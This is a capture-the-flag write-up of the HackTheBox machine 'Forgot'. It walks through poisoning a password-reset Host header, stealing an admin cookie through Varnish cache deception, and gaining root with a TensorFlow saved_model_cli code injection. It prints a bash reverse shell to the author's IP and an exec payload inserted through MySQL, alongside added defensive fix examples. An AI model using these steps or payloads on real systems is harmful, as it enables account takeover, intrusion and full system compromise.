# Forgot

Forgot is a medium-difficulty Linux machine from [HackTheBox](https://app.hackthebox.com/machines/Forgot) created by MrR3boot. This box is confusing and slow, so you need a lot of patience to complete it. In this post my IP is 10.10.14.18 and the target’s IP is 10.129.228.104.

### Gathering Information

This step is always the same: ping the machine to see if it is alive, then use Nmap to scan all the ports to avoid surprises.

{% code title="Local Terminal" %}

```bash
nmap -p- --open -T5 -v -n 10.129.228.104
```

{% endcode %}

<figure><img src="https://937334506-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FNqjbvJ4m6enB6HiVWSTQ%2Fuploads%2FttlqNN5P3SNWP3O27D0t%2Fimage.png?alt=media&#x26;token=122e7226-94cc-4ec3-a978-a32bd97ca5d4" alt=""><figcaption><p>Nmap’s output, just a website?</p></figcaption></figure>

{% code title="Local Terminal" %}

```bash
nmap -sC -sV -p 22,80 10.129.228.104
```

{% endcode %}

<figure><img src="https://937334506-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FNqjbvJ4m6enB6HiVWSTQ%2Fuploads%2FAgBhjzbiXHZ9SbfFI68x%2Fimage.png?alt=media&#x26;token=6b81cce9-63ab-40a0-bfaa-da83c18af63e" alt=""><figcaption></figcaption></figure>

<figure><img src="https://937334506-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FNqjbvJ4m6enB6HiVWSTQ%2Fuploads%2Fnp80yLVBrbXQC5LpLCpA%2Fimage.png?alt=media&#x26;token=691bdfc8-c076-4595-8028-5461f2a8fada" alt=""><figcaption></figcaption></figure>

It’s just a website, but there is something weird about it.

{% code title="Local Terminal" %}

```bash
whatweb http://10.129.228.104
```

{% endcode %}

<figure><img src="https://937334506-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FNqjbvJ4m6enB6HiVWSTQ%2Fuploads%2Fx0IossIR0GWRpDVFi3Mh%2Fimage.png?alt=media&#x26;token=ba9a9cda-6cb4-4772-948c-94d8ded37dd2" alt=""><figcaption><p>Relevant information: Varnish 6.2. After exploring the site, research that version.</p></figcaption></figure>

* Browser:         <http://10.129.228.104>

<figure><img src="https://937334506-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FNqjbvJ4m6enB6HiVWSTQ%2Fuploads%2F44wAJs9enRLiljPMTyiE%2Fimage.png?alt=media&#x26;token=d88b2209-fd37-48b4-9a0f-edb211cca5f3" alt=""><figcaption><p>Main page</p></figcaption></figure>

<figure><img src="https://937334506-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FNqjbvJ4m6enB6HiVWSTQ%2Fuploads%2FG8GglcX5qVLlCpJur4hc%2Fimage.png?alt=media&#x26;token=b4e34423-e1b2-4013-a1e0-e5199c4d4058" alt=""><figcaption><p>Fragment of the main page source code (CTRL+U)</p></figcaption></figure>

Add this to your notes: {user : robert-dev-14522}. Still, we don’t have much information, so our best option is to fuzz the website and try to obtain more.

{% code title="Local Terminal" %}

```bash
wfuzz -c -t 200 --hc=404 -w /usr/share/wordlists/dirb/big.txt http://10.129.228.104/FUZZ
```

{% endcode %}

<figure><img src="https://937334506-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FNqjbvJ4m6enB6HiVWSTQ%2Fuploads%2FzJE2sRemj8CTUWOV3jRP%2Fimage.png?alt=media&#x26;token=78def0c4-cd1e-45b0-9a92-f5e7c9060ce5" alt=""><figcaption><p>home, tickets, and reset. Interesting.</p></figcaption></figure>

My target instance died and was respawned, so from here on the target IP is **10.129.219.117**

* Browser:         <http://10.129.219.117/forgot>

<figure><img src="https://937334506-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FNqjbvJ4m6enB6HiVWSTQ%2Fuploads%2FGji9vANgua8P1jvr9rTH%2Fimage.png?alt=media&#x26;token=79e0cfce-454f-4aa0-a101-4f2ef79a638a" alt=""><figcaption></figcaption></figure>

We can see that the website sends a reset link to the user. We need to intercept it, using one terminal, Burpsuite, and your browser.

### User Interception Step

First, from **<http://10.129.219.117>** take the current “robert-dev” username using view-source (CTRL+U), or try **curl <http://10.129.219.117/> | grep "Q1 release fix by"**

{% code title="Local Terminal" %}

```bash
nc -lvnp 443
```

{% endcode %}

* Burpsuite:       {INTERCEPT ON}
* Browser:         {username: robert-dev-14522} {PRESS RESET}
* Burpsuite:       Change host to your IP address and netcat port, like 10.10.14.18:443

<figure><img src="https://937334506-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FNqjbvJ4m6enB6HiVWSTQ%2Fuploads%2F6KFhMD5se4UlIpavoP94%2Fimage.png?alt=media&#x26;token=1860ad82-cf34-4515-ab64-b39c823f55ab" alt=""><figcaption><p>Burpsuite modification</p></figcaption></figure>

* Burpsuite: {Press Forward}
* Burpsuite: {Intercept OFF}

<figure><img src="https://937334506-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FNqjbvJ4m6enB6HiVWSTQ%2Fuploads%2FiuC8VoHwz8ElQkQg1sSK%2Fimage.png?alt=media&#x26;token=d13e5e98-8a14-4e53-8045-afdd34266346" alt=""><figcaption><p>Wait around 1-2 minutes; netcat will receive this. Copy the token URL.</p></figcaption></figure>

* Browser:                     <http://10.129.219.117/reset?token=iATub9koGT1P79mowK2i%2B7zoJgnmsxWu1Fo4jWi0gPv8laTB3SzWbEPr8Om53r7Gcqt1Mu6U%2Bh4XqhSp7HoJ8A%3D%3D>

<figure><img src="https://937334506-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FNqjbvJ4m6enB6HiVWSTQ%2Fuploads%2FUDR48scceOSwizSmKlcC%2Fimage.png?alt=media&#x26;token=a218f2f3-4990-489e-88b6-554473267de9" alt=""><figcaption><p>Change the password to anything (here: pass123)</p></figcaption></figure>
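The reset link above reached our netcat listener because the application built it from the attacker-controlled Host header. As an added illustration (not code from the box or from this writeup), here is the vulnerable pattern beside the hardened one; the function names and the `ALLOWED_HOSTS` values are assumptions.

```python
# Added example, not the Forgot application's code: why rewriting the Host
# header to 10.10.14.18:443 redirected the reset link, and how an allow-list
# on the host prevents it.
from urllib.parse import quote, urlsplit

# Hosts the application is legitimately served under (constructed values).
ALLOWED_HOSTS = {"10.129.219.117", "forgot.htb"}


def canonical_host(request_host: str) -> str:
    """Return the request's Host only if it is allow-listed, else raise.

    The Host header is attacker-controlled; never echo it into a reset
    link unless it matches configured, trusted hosts.
    """
    host = request_host.strip().lower()
    if host not in ALLOWED_HOSTS:
        raise ValueError(f"untrusted Host header: {request_host!r}")
    return host


def build_reset_url_insecure(request_host: str, token: str) -> str:
    """Vulnerable pattern: the link is built from whatever Host arrived."""
    return f"http://{request_host}/reset?token={quote(token, safe='')}"


def build_reset_url(request_host: str, token: str) -> str:
    """Hardened: the link is built only from an allow-listed host."""
    host = canonical_host(request_host)
    return f"http://{host}/reset?token={quote(token, safe='')}"


def link_points_at_app(url: str) -> bool:
    """Check helper: does a generated link stay on a trusted host?"""
    return urlsplit(url).hostname in ALLOWED_HOSTS


if __name__ == "__main__":
    # Constructed token; the '+' and '==' are percent-encoded like on the box.
    print(build_reset_url_insecure("10.10.14.18:443", "abc+=="))
    print(build_reset_url("10.129.219.117", "abc+=="))
```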

Now we have to login.

* Browser:         <http://10.129.219.117>

<figure><img src="https://937334506-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FNqjbvJ4m6enB6HiVWSTQ%2Fuploads%2FBqB5Ib3IVqpo9geAZ1mN%2Fimage.png?alt=media&#x26;token=47a87662-10f3-47e2-bc4a-0a352c06626a" alt=""><figcaption><p>Home Portal</p></figcaption></figure>

This machine has a timer that changes the “robert-dev” username, and the reset will fail if you are slow. If that happens, repeat everything from “User Interception Step”.

<figure><img src="https://937334506-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FNqjbvJ4m6enB6HiVWSTQ%2Fuploads%2FWFMfJqbjPPWWSbaMb5El%2Fimage.png?alt=media&#x26;token=2ef3e871-3a3e-4347-b7bf-dc2300543b8c" alt=""><figcaption><p><a href="http://10.129.219.117/tickets">http://10.129.219.117/tickets</a></p></figcaption></figure>

<figure><img src="https://937334506-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FNqjbvJ4m6enB6HiVWSTQ%2Fuploads%2FkYc37viS9QbbH8gt3wnV%2Fimage.png?alt=media&#x26;token=b91d02cc-dad1-43a5-9fdc-25cd9403acd2" alt=""><figcaption><p><a href="http://10.129.219.117/escalation">http://10.129.219.117/escalation</a></p></figcaption></figure>

### Login through SSH

This version of Varnish has an issue with the cache (this was hard to find). We will use it to capture the administrator’s cookie and, from there, get credentials to log in directly to the machine.

<figure><img src="https://937334506-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FNqjbvJ4m6enB6HiVWSTQ%2Fuploads%2FO2ofH3T8va9jorbVM8dr%2Fimage.png?alt=media&#x26;token=3a73fbbe-ad4a-4322-a2cb-58ac3b0c1a87" alt=""><figcaption><p>view:source of home, /admin_tickets sounds like an important path</p></figcaption></figure>

First, we need to submit a ticket containing a valid URL on the machine plus a fictional directory. The best place is /static, where the .js files are served, because Varnish caches that path. After this, we will get the admin’s cookie and use it to reach /admin\_tickets.

* Browser:         <http://10.129.219.117/escalation>

<figure><img src="https://937334506-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FNqjbvJ4m6enB6HiVWSTQ%2Fuploads%2Fbp5OtmSv6KrjY3owZcJM%2Fimage.png?alt=media&#x26;token=194de6c6-496f-4315-bc3f-2fe446acbdc7" alt=""><figcaption><p>Submit!</p></figcaption></figure>

Here you have to wait around two or three minutes. Meanwhile, if you want, you can retrieve your own **user cookie** for comparison by intercepting a page such as <http://10.129.219.117/escalation> in Burpsuite while logged in.

After waiting, we can get the cookie from the fictional page.

{% code title="Local Terminal" %}

```bash
curl -I http://10.129.219.117/static/directory
```

{% endcode %}

<figure><img src="https://937334506-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FNqjbvJ4m6enB6HiVWSTQ%2Fuploads%2F44pchNGf4Q35dboOdYsj%2Fimage.png?alt=media&#x26;token=6030fe07-e8e3-4c16-a920-4a1a44905516" alt=""><figcaption><p>Admin cookie. If this fails, repeat by submitting a new ticket with a new folder name.</p></figcaption></figure>
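The cookie leaked because the cache stored a response to a non-existent path under /static together with its Set-Cookie header, and then served it to anyone who asked. As an added example (not the box’s Varnish configuration), the admission check below expresses the rules a proxy in front of this app should enforce; the function name and extension list are assumptions.

```python
# Added example, not Varnish VCL from the box: a cache-admission decision
# that refuses to store responses like the one read back with
# `curl -I /static/directory` above.
import posixpath

# Extensions that are genuinely static on this kind of app (constructed list).
STATIC_EXTENSIONS = {".js", ".css", ".png", ".jpg", ".ico", ".woff2"}


def cacheable(path: str, status: int, headers: dict) -> bool:
    """Decide whether a shared cache may store this upstream response.

    All rules must hold:
      1. the path is under /static/ and ends in a real static extension,
         so /static/directory (routed to the app) is never stored;
      2. the origin answered 200 (errors and redirects are not stored);
      3. the response carries no Set-Cookie and is not Cache-Control: private.
    """
    lower = {k.lower(): v for k, v in headers.items()}
    clean_path = path.split("?", 1)[0]
    _, ext = posixpath.splitext(clean_path)
    if not clean_path.startswith("/static/"):
        return False
    if ext.lower() not in STATIC_EXTENSIONS:
        return False
    if status != 200:
        return False
    if "set-cookie" in lower:
        return False
    if "private" in lower.get("cache-control", "").lower():
        return False
    return True


if __name__ == "__main__":
    # Constructed responses: a real asset versus the deception request.
    print(cacheable("/static/app.js", 200, {"Content-Type": "text/javascript"}))
    print(cacheable("/static/directory", 404, {"Set-Cookie": "session=admin"}))
```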

Now that we have the administrator’s cookie, we use Burpsuite to swap in that cookie when requesting /admin\_tickets.

* Burpsuite {Intercept ON}
* Browser:         <http://10.129.219.117/admin_tickets>
* Burpsuite {Replace Cookie}

<figure><img src="https://937334506-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FNqjbvJ4m6enB6HiVWSTQ%2Fuploads%2Fr7zsGpFXpML5p8gYpWeV%2Fimage.png?alt=media&#x26;token=405c62d5-e898-4690-b793-9eb5f4fcb4f0" alt=""><figcaption></figcaption></figure>

* Burpsuite {Forward}
* Burpsuite {Intercept OFF}

<figure><img src="https://937334506-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FNqjbvJ4m6enB6HiVWSTQ%2Fuploads%2FIQmNGDGAkJVYSjnc8obl%2Fimage.png?alt=media&#x26;token=30e373b1-1c37-4caf-9f5d-a5b958e2bf57" alt=""><figcaption><p>And we are in! Look, there is an SSH issue</p></figcaption></figure>

We try to log in with these credentials, but first note that this website capitalises the first letter of everything it renders, so we take the credentials from the page source instead.

<figure><img src="https://937334506-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FNqjbvJ4m6enB6HiVWSTQ%2Fuploads%2F5eKv3WMnfFf2HiNmPEuv%2Fimage.png?alt=media&#x26;token=ebb171e5-00c7-4a0d-ba7b-1dd166314759" alt=""><figcaption><p>view:source of /admin_tickets… {diego:dCb#1!x0%gjq}</p></figcaption></figure>

{% code title="Local Terminal" %}

```bash
ssh diego@10.129.219.117                     #password: dCb#1!x0%gjq
```

{% endcode %}

Now our Local Terminal \[**Term**] has become the Target Terminal \[**Diego**]

<figure><img src="https://937334506-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FNqjbvJ4m6enB6HiVWSTQ%2Fuploads%2FbSZF89Nl3KmWwYfugYrb%2Fimage.png?alt=media&#x26;token=3651bf81-3f38-4b3f-9e26-dfe49e24e221" alt=""><figcaption><p>Get the user.txt</p></figcaption></figure>

### Privilege Escalation

Now we want to become root. First, we check which applications we can execute as root.

{% code title="Target Terminal Diego" %}

```bash
sudo -l
```

{% endcode %}

<figure><img src="https://937334506-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FNqjbvJ4m6enB6HiVWSTQ%2Fuploads%2FXaIPi1mMhGB4qGyCm08A%2Fimage.png?alt=media&#x26;token=b0026699-b921-460f-ad8d-829c1eb27959" alt=""><figcaption></figcaption></figure>

{% code title="Target Terminal Diego" %}

```bash
cat /opt/security/ml_security.py
```

{% endcode %}

Exploring the code, we find two things: it reads a MySQL database, and given the TensorFlow version, we can [inject code through saved\_model\_cli](https://github.com/advisories/GHSA-75c9-jrh4-79mc) to execute another bash script. I found an explanation and steps in this [post](https://breached.vc/Thread-Forgot-HTB-Discussion?page=4).

<figure><img src="https://937334506-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FNqjbvJ4m6enB6HiVWSTQ%2Fuploads%2FKfaBWdBnZmE0lhSAUodu%2Fimage.png?alt=media&#x26;token=b5d2486d-0899-49ad-b235-fe48d805b504" alt=""><figcaption><p>It’s connected to SQL! Nice.</p></figcaption></figure>
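The advisory linked above concerns `saved_model_cli` evaluating `--input_exprs` text with `eval`, which is why a database row can end up running as root here. As an added example (not TensorFlow’s code and not the box’s `ml_security.py`), the two parsers below show the old behaviour beside a literal-only parser of the kind the fix introduced; the function names are hypothetical.

```python
# Added example, not TensorFlow's implementation: the eval() pattern behind
# GHSA-75c9-jrh4-79mc beside a literal-only replacement. Input format is
# 'name=expr;name=expr', the shape saved_model_cli accepts for --input_exprs.
import ast


def parse_input_exprs_unsafe(spec: str) -> dict:
    """Old behaviour: every expression is handed to eval(), so any Python
    in the database-sourced text runs with the caller's privileges."""
    result = {}
    for item in spec.split(";"):
        name, expr = item.split("=", 1)
        result[name.strip()] = eval(expr)  # deliberately unsafe, for contrast
    return result


def parse_input_exprs(spec: str) -> dict:
    """Fixed behaviour: only Python literals (numbers, strings, lists,
    tuples, dicts, booleans, None) are accepted. Calls, attribute access,
    exec and __import__ are rejected with ValueError."""
    result = {}
    for item in spec.split(";"):
        if "=" not in item:
            raise ValueError(f"expected name=expr, got {item!r}")
        name, expr = item.split("=", 1)
        try:
            result[name.strip()] = ast.literal_eval(expr.strip())
        except (ValueError, SyntaxError) as exc:
            raise ValueError(f"{name.strip()}: not a literal: {expr!r}") from exc
    return result


def safe_to_run(spec: str) -> bool:
    """Pre-check a database row before it is passed to the model CLI."""
    try:
        parse_input_exprs(spec)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    # Constructed rows: a legitimate input and a code-bearing one.
    print(safe_to_run("x=[1, 2, 3];y='hi'"))
    print(safe_to_run('hello=exec("import os")'))
```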

{% code title="Target Terminal Diego" %}

```bash
mysql -u diego -p          #pass: dCb#1!x0%gjq
```

{% endcode %}

{% code title="Target Terminal Diego (SQL)" %}

```sql
SHOW DATABASES;
USE app;
SHOW TABLES;
SELECT * FROM users;
```

{% endcode %}

<figure><img src="https://937334506-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FNqjbvJ4m6enB6HiVWSTQ%2Fuploads%2F3c1nnszRsSbBpmnCA6JK%2Fimage.png?alt=media&#x26;token=6c87667c-4ce3-433d-a05b-7f81ad4a8e51" alt=""><figcaption><p>app's Tables</p></figcaption></figure>

<figure><img src="https://937334506-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FNqjbvJ4m6enB6HiVWSTQ%2Fuploads%2FPwjyaVpUlrwLbRdpfl1x%2Fimage.png?alt=media&#x26;token=f680c109-1f06-45ed-9cd6-42ae0ddb5da7" alt=""><figcaption><p>Content of users table</p></figcaption></figure>

Still, I couldn’t do anything else with this information…

{% code title="Target Terminal Diego" %}

```bash
cd /dev/shm
vi script.sh
```

{% endcode %}

{% code title="Content of script.sh" %}

```bash
#!/bin/bash

bash -i >& /dev/tcp/10.10.14.18/443 0>&1
```

{% endcode %}

{% code title="Target Terminal Diego" %}

```bash
chmod 777 script.sh
mysql -u diego -p                 #pass: dCb#1!x0%gjq
```

{% endcode %}

From here, we need three terminals: two connected to the target as Diego, one for the MySQL queries \[**MySQL**] and the other to execute ml\_security.py \[**Diego**], plus one Local Terminal \[**Term**].

{% code title="Target Terminal \[MySQL]" %}

```sql
use app;
insert into escalate values ("TEXT","TEXT","TEXT",'hello=exec("""\nimport os\nos.system("/dev/shm/script.sh")\nprint("&ErrMsg=%3Cimg%20src=%22http://imgur.com/bTkSe.png%22%20/%3E%3CSCRIPT%3Ealert%28%22xss%22%29%3C/SCRIPT%3E")""")');
```

{% endcode %}

{% code title="Local Terminal \[Term]" %}

```bash
nc -nlvp 443
```

{% endcode %}

{% code title="Target Terminal \[Diego]" %}

```bash
sudo /opt/security/ml_security.py
```

{% endcode %}

<figure><img src="https://937334506-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FNqjbvJ4m6enB6HiVWSTQ%2Fuploads%2FQq5kzy0oaim6qQ3eKsjW%2Fimage.png?alt=media&#x26;token=dfedec38-bd1a-4cba-85ed-c498a6355025" alt=""><figcaption><p>Now [Term] is [Root]</p></figcaption></figure>

{% code title="Target Root" %}

```bash
cd /root
ls
cat root.txt
```

{% endcode %}

<figure><img src="https://937334506-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FNqjbvJ4m6enB6HiVWSTQ%2Fuploads%2Fvup3r6LbiqUolU1qAXMY%2Fimage.png?alt=media&#x26;token=9fa0090d-fca6-4712-8bf3-73cfcda5e851" alt=""><figcaption><p>Root flag!</p></figcaption></figure>
